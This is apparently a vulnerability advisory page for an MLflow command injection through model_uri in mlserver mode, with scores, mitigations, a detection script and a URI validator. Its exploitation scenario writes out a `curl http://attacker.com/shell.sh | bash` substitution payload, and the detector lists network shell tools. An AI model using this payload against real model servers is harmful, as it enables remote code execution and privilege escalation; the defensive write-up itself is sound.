CVE-2026-0596: MLflow: command injection via model_uri in mlserver mode

GHSA-rvhj-8chj-8v3c CRITICAL CISA: ATTEND
Published March 31, 2026
CISO Take

MLflow deployments that serve models with `enable_mlserver=True` are vulnerable to OS command injection: the model URI is interpolated, unsanitized, into a command string executed by `bash -c`. Any environment where lower-privileged users can write to model directories that a higher-privileged service serves from is exposed to privilege escalation. Upgrade to MLflow 3.9.0 or later; until that is done, audit serving configurations and disable mlserver mode unless it is strictly required.

What is the risk?

CRITICAL in multi-user or shared MLOps environments (CVSS 3.1 base score 9.6). CWE-78 command injection is a well-understood, trivially exploitable class once the attack vector is reachable, and a public proof of concept exists. The privilege escalation path takes this beyond an ordinary code execution bug: an attacker pivots from a low-privileged ML engineer account, or a compromised pipeline, to the service account running MLflow serving. MLflow is widely deployed in enterprise data science platforms, often with broad network access to model registries and downstream inference systems, so that service account is a valuable foothold.

What systems are affected?

Package   Ecosystem   Vulnerable range   Patched in
MLflow    pip         < 3.9.0            3.9.0
mflow     pip         < 3.9.0            3.9.0

How severe is it?

CVSS 3.1 base score: 9.6 / 10 (CRITICAL)
EPSS: 1.3% chance of exploitation in the next 30 days (higher than 67% of all CVEs)
Exploitation status: exploit available (exploitation likelihood MEDIUM, confidence medium)
Sophistication: trivial
CISA SSVC exploitation: public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV): Adjacent
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Note that PR:None rates the attacker as unprivileged, while the advisory's own scenario requires write access to a directory the serving process loads models from. In deployments where model directories are write-restricted to the serving account, treat 9.6 as an upper bound rather than the effective score.

What should I do?

6 steps
  1. PATCH

    Upgrade to MLflow 3.9.0 or later, the release the package table lists as patched; confirm the installed version with `pip show mlflow` on every serving host and image.

  2. WORKAROUND

    Set `enable_mlserver=False` (the default) in all model serving configurations unless mlserver mode is operationally required; the vulnerable `bash -c` path is only reached when it is enabled.

  3. ACCESS CONTROL

    Restrict write permissions on model directories to trusted service accounts only; remove write access for human users and CI pipelines that do not need it, since write access to a served model directory is the precondition for the escalation.

  4. INPUT VALIDATION

    If `enable_mlserver=True` must remain enabled, enforce an allowlist validator on `model_uri` values (URI scheme, path characters, no shell metacharacters) before they reach the shell invocation layer, and treat a rejection as a security event, not just a bad request.

  5. DETECTION

    Alert on unexpected child processes of MLflow serving processes (e.g., curl, wget, nc, or a second shell). Note that in mlserver mode one `bash -c` directly under the serving process is expected, because that is the code path the vulnerability lives in; baseline that and alert on what the shell spawns. Use EDR or auditd execve rules keyed on the serving account.

  6. LEAST PRIVILEGE

    Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles and pod security settings in Kubernetes deployments so a compromised serving process cannot reach the model registry or cluster API with more rights than it needs.
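The detection step above, worked as code. This is an added example, not a vendor rule set: it parses auditd execve records, rebuilds the process tree, and flags network/download tools and nested shells under the serving process while tolerating the single `bash -c` that mlserver mode legitimately spawns. The sample records are constructed for this example, and the `comm=` names used to recognise the serving process (`mlflow`, `gunicorn`) are an assumption to adjust to your deployment.

```python
"""Process-tree detection over auditd execve records.

Added example for this advisory; not MLflow code and not a vendor rule.
"""
import re
from dataclasses import dataclass

# Constructed sample auditd SYSCALL records (execve, fields trimmed); not real logs.
# mlflow -> bash -> mlserver is the chain mlserver mode legitimately creates.
# pids 4218/4220/4225 model an injected `curl ... | bash` stage that then runs nc.
# pid 5000 is an unrelated curl outside the serving tree.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1711900000.101:501): arch=c000003e syscall=59 success=yes ppid=1 pid=4200 uid=1001 comm="mlflow" exe="/opt/venv/bin/python3" key="mlflow-exec"
type=SYSCALL msg=audit(1711900000.205:502): arch=c000003e syscall=59 success=yes ppid=4200 pid=4211 uid=1001 comm="bash" exe="/usr/bin/bash" key="mlflow-exec"
type=SYSCALL msg=audit(1711900000.310:503): arch=c000003e syscall=59 success=yes ppid=4211 pid=4215 uid=1001 comm="mlserver" exe="/opt/venv/bin/python3" key="mlflow-exec"
type=SYSCALL msg=audit(1711900000.412:504): arch=c000003e syscall=59 success=yes ppid=4211 pid=4218 uid=1001 comm="curl" exe="/usr/bin/curl" key="mlflow-exec"
type=SYSCALL msg=audit(1711900000.550:505): arch=c000003e syscall=59 success=yes ppid=4211 pid=4220 uid=1001 comm="bash" exe="/usr/bin/bash" key="mlflow-exec"
type=SYSCALL msg=audit(1711900000.700:506): arch=c000003e syscall=59 success=yes ppid=4220 pid=4225 uid=1001 comm="nc" exe="/usr/bin/nc" key="mlflow-exec"
type=SYSCALL msg=audit(1711900001.001:507): arch=c000003e syscall=59 success=yes ppid=1 pid=5000 uid=0 comm="curl" exe="/usr/bin/curl" key="mlflow-exec"
"""

# Assumption: how the serving process appears in comm=.  Adjust per deployment.
SERVING_ROOTS = {"mlflow", "gunicorn"}
SHELLS = {"bash", "sh", "dash", "zsh"}
NET_TOOLS = {"curl", "wget", "nc", "ncat", "netcat", "socat"}

# syscall=59 is execve on x86_64 (arch=c000003e); `ausearch -i` renders it as execve.
_EXECVE = re.compile(
    r'\bsyscall=(?:59|execve)\b.*?\bppid=(?P<ppid>\d+)\s+pid=(?P<pid>\d+).*?\bcomm="(?P<comm>[^"]*)"'
)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str


@dataclass(frozen=True)
class Alert:
    pid: int
    comm: str
    reason: str


def parse_execve_records(log_text: str) -> dict[int, Proc]:
    """Build a pid -> Proc table from execve SYSCALL records; other lines are ignored."""
    procs: dict[int, Proc] = {}
    for line in log_text.splitlines():
        m = _EXECVE.search(line)
        if m:
            procs[int(m["pid"])] = Proc(int(m["pid"]), int(m["ppid"]), m["comm"])
    return procs


def lineage(procs: dict[int, Proc], pid: int) -> list[Proc]:
    """Ancestors of pid that appear in the log, nearest first (cycle-safe)."""
    chain: list[Proc] = []
    seen = {pid}
    cur = procs.get(pid)
    while cur is not None and cur.ppid in procs and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = procs[cur.ppid]
        chain.append(cur)
    return chain


def detect_unexpected_children(log_text: str) -> list[Alert]:
    """Flag processes under a serving root that a model server has no business running."""
    procs = parse_execve_records(log_text)
    alerts: list[Alert] = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        parents = lineage(procs, p.pid)
        if not any(a.comm in SERVING_ROOTS for a in parents):
            continue  # not under a serving process: out of scope for this rule
        direct = procs.get(p.ppid)
        if p.comm in NET_TOOLS:
            alerts.append(Alert(p.pid, p.comm, "network/download tool under the serving process"))
        elif p.comm in SHELLS and (direct is None or direct.comm not in SERVING_ROOTS):
            # One `bash -c` directly under the serving process is expected in
            # mlserver mode; a shell anywhere deeper in the tree is not.
            alerts.append(Alert(p.pid, p.comm, "nested shell not spawned directly by the serving process"))
    return alerts


if __name__ == "__main__":
    for alert in detect_unexpected_children(SAMPLE_AUDIT_LOG):
        print(f"ALERT pid={alert.pid} comm={alert.comm}: {alert.reason}")
```

To feed it real records, audit execve for the serving account (for example `-a always,exit -F arch=b64 -S execve -F euid=1001 -k mlflow-exec` with the uid of the service account, and `ausearch -k mlflow-exec` to pull the records) rather than auditing every process on the host; the rule's signal comes from the tree shape, so it needs the ppid chain intact.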

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  Article 15 - Accuracy, robustness and cybersecurity
  Article 9 - Risk management system
ISO 42001
  A.6.1.3 - Risk treatment for AI systems
  A.6.2.6 - Security of AI system processing environments
NIST AI RMF
  GOVERN 6.1 - Policies and procedures are in place for AI risk
  MANAGE 2.4 - Residual risks and treatment approaches
OWASP LLM Top 10
  LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-0596?

MLflow deployments that serve models with `enable_mlserver=True` are vulnerable to OS command injection: the model URI is interpolated, unsanitized, into a command string executed by `bash -c`. Any environment where lower-privileged users can write to model directories that a higher-privileged service serves from is exposed to privilege escalation. Upgrade to MLflow 3.9.0 or later; until that is done, audit serving configurations and disable mlserver mode unless it is strictly required.

Is CVE-2026-0596 actively exploited?

No confirmed in-the-wild exploitation of CVE-2026-0596 has been reported, but a public proof of concept exists (CISA SSVC exploitation: poc) and the injection is trivial to reproduce, so organizations should patch proactively.

How to fix CVE-2026-0596?

1. PATCH: Upgrade to MLflow 3.9.0 or later, the release listed as patched; confirm the installed version with `pip show mlflow`.
2. WORKAROUND: Set `enable_mlserver=False` (the default) in all model serving configurations unless mlserver mode is operationally required.
3. ACCESS CONTROL: Restrict write permissions on model directories to trusted service accounts only; remove write access for human users and CI pipelines that do not need it.
4. INPUT VALIDATION: If `enable_mlserver=True` must remain enabled, enforce an allowlist validator on `model_uri` values before they reach the shell invocation layer.
5. DETECTION: Alert on unexpected child processes of MLflow serving processes (e.g., curl, wget, nc, or a second shell); one `bash -c` directly under the serving process is expected in mlserver mode. Use EDR or auditd execve rules targeting the MLflow process tree.
6. LEAST PRIVILEGE: Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

What systems are affected by CVE-2026-0596?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps platforms, training pipelines, CI/CD for ML.

What is the CVSS score for CVE-2026-0596?

CVE-2026-0596 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS probability of exploitation within the next 30 days is 1.33%.

What is the AI security impact?

Affected AI Architectures

model serving, MLOps platforms, training pipelines, CI/CD for ML

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.1.3, A.6.2.6
NIST AI RMF: GOVERN 6.1, MANAGE 2.4
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users.

Exploitation Scenario

An adversary with write access to a shared model artifact directory (e.g., a data scientist with legitimate credentials, or an attacker who has compromised a low-privileged CI/CD pipeline) uploads a model whose registered URI contains a shell metacharacter payload such as `$(curl http://attacker.com/shell.sh | bash)` or a backtick-wrapped command. When the higher-privileged MLflow model serving process starts and invokes `bash -c` with the unsanitized URI, the injected command executes at the service's privilege level. The attacker establishes persistence, exfiltrates model artifacts, or pivots laterally within the ML infrastructure — all without ever exploiting a network-facing vulnerability directly.
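The injection described in the advisory and the scenario above, beside the fix that step 4 of the mitigation list calls for. This is an added example, not MLflow's source: the "vulnerable" builder is a simplified reconstruction of the pattern the advisory describes (URI interpolated into one string handed to `bash -c`), with `echo` standing in for the real serving binary so the demonstration is harmless. The allowlist pattern, the function names and the `models:/`, `runs:/`, `file://` URI forms accepted are assumptions for this example; tighten the allowlist to the schemes your registry actually issues.

```python
"""Vulnerable shell-string pattern beside a hardened argv form, plus a
model_uri allowlist validator.  Added example; not MLflow's own code.
"""
import re
import shlex
import shutil
import subprocess

# Characters bash treats specially.  Any of them in a model_uri is grounds for
# rejection before the value can get anywhere near a command line.
SHELL_METACHARS = frozenset("$`;|&<>(){}*?[]!~\n\t ") | frozenset("\\\"'")

# Allowlist for the URI forms a registry typically issues (runs:/, models:/,
# file://, s3://, plain paths).  Assumption for this example; tighten as needed.
_ALLOWED_URI = re.compile(r"[A-Za-z0-9./][A-Za-z0-9._/@:+=-]{0,1023}")

# The live demo needs a real bash and echo; the validator itself does not.
DEMO_AVAILABLE = shutil.which("bash") is not None and shutil.which("echo") is not None


def validate_model_uri(model_uri: str) -> str:
    """Return model_uri unchanged if it is plain URI/path text, else raise ValueError."""
    if not model_uri or model_uri.startswith("-"):
        raise ValueError("model_uri is empty or starts with '-' (would parse as an option)")
    bad = sorted(c for c in set(model_uri) if c in SHELL_METACHARS)
    if bad:
        raise ValueError(f"model_uri contains shell metacharacters: {bad!r}")
    if not _ALLOWED_URI.fullmatch(model_uri):
        raise ValueError("model_uri contains characters outside the allowlist")
    if ".." in model_uri.split("/"):
        raise ValueError("model_uri contains a '..' path segment")
    return model_uri


def is_safe_model_uri(model_uri: str) -> bool:
    """Boolean wrapper around validate_model_uri for policy checks."""
    try:
        validate_model_uri(model_uri)
        return True
    except ValueError:
        return False


def build_serve_command_vulnerable(model_uri: str) -> list[str]:
    """The CWE-78 pattern the advisory describes: the URI is interpolated into
    one string that bash parses, so $(...) and backticks get evaluated."""
    return ["bash", "-c", f"echo serving {model_uri}"]


def build_serve_command_hardened(model_uri: str) -> list[str]:
    """Validate, then pass the URI as its own argv element.  No shell parses it,
    so even a metacharacter that slipped past the allowlist stays literal."""
    return ["echo", "serving", validate_model_uri(model_uri)]


def run(argv: list[str]) -> str:
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout.strip()


def demo(payload: str = "runs:/$(echo INJECTED)/model") -> dict[str, str]:
    """Push the same payload through both paths (requires bash and echo on PATH)."""
    result = {
        "shell": run(build_serve_command_vulnerable(payload)),  # substitution fires
        "argv": run(["echo", "serving", payload]),               # payload stays literal
    }
    try:
        validate_model_uri(payload)
        result["validator"] = "accepted"
    except ValueError as exc:
        result["validator"] = f"rejected: {exc}"
    return result


if __name__ == "__main__":
    if DEMO_AVAILABLE:
        for path, out in demo().items():
            print(f"{path:>9}: {out}")
    print("hardened argv:", shlex.join(build_serve_command_hardened("models:/fraud-detector/3")))
```

The argv form alone already neutralises the payload, which is why the CWE guidance above prefers library calls and argument vectors over a shell string; the allowlist is defence in depth that also catches values the serving CLI would misparse (a leading `-`, `..` segments) and gives you a loggable rejection rather than a silent quirk.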

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
March 31, 2026
Last Modified
May 20, 2026
First Seen
March 31, 2026
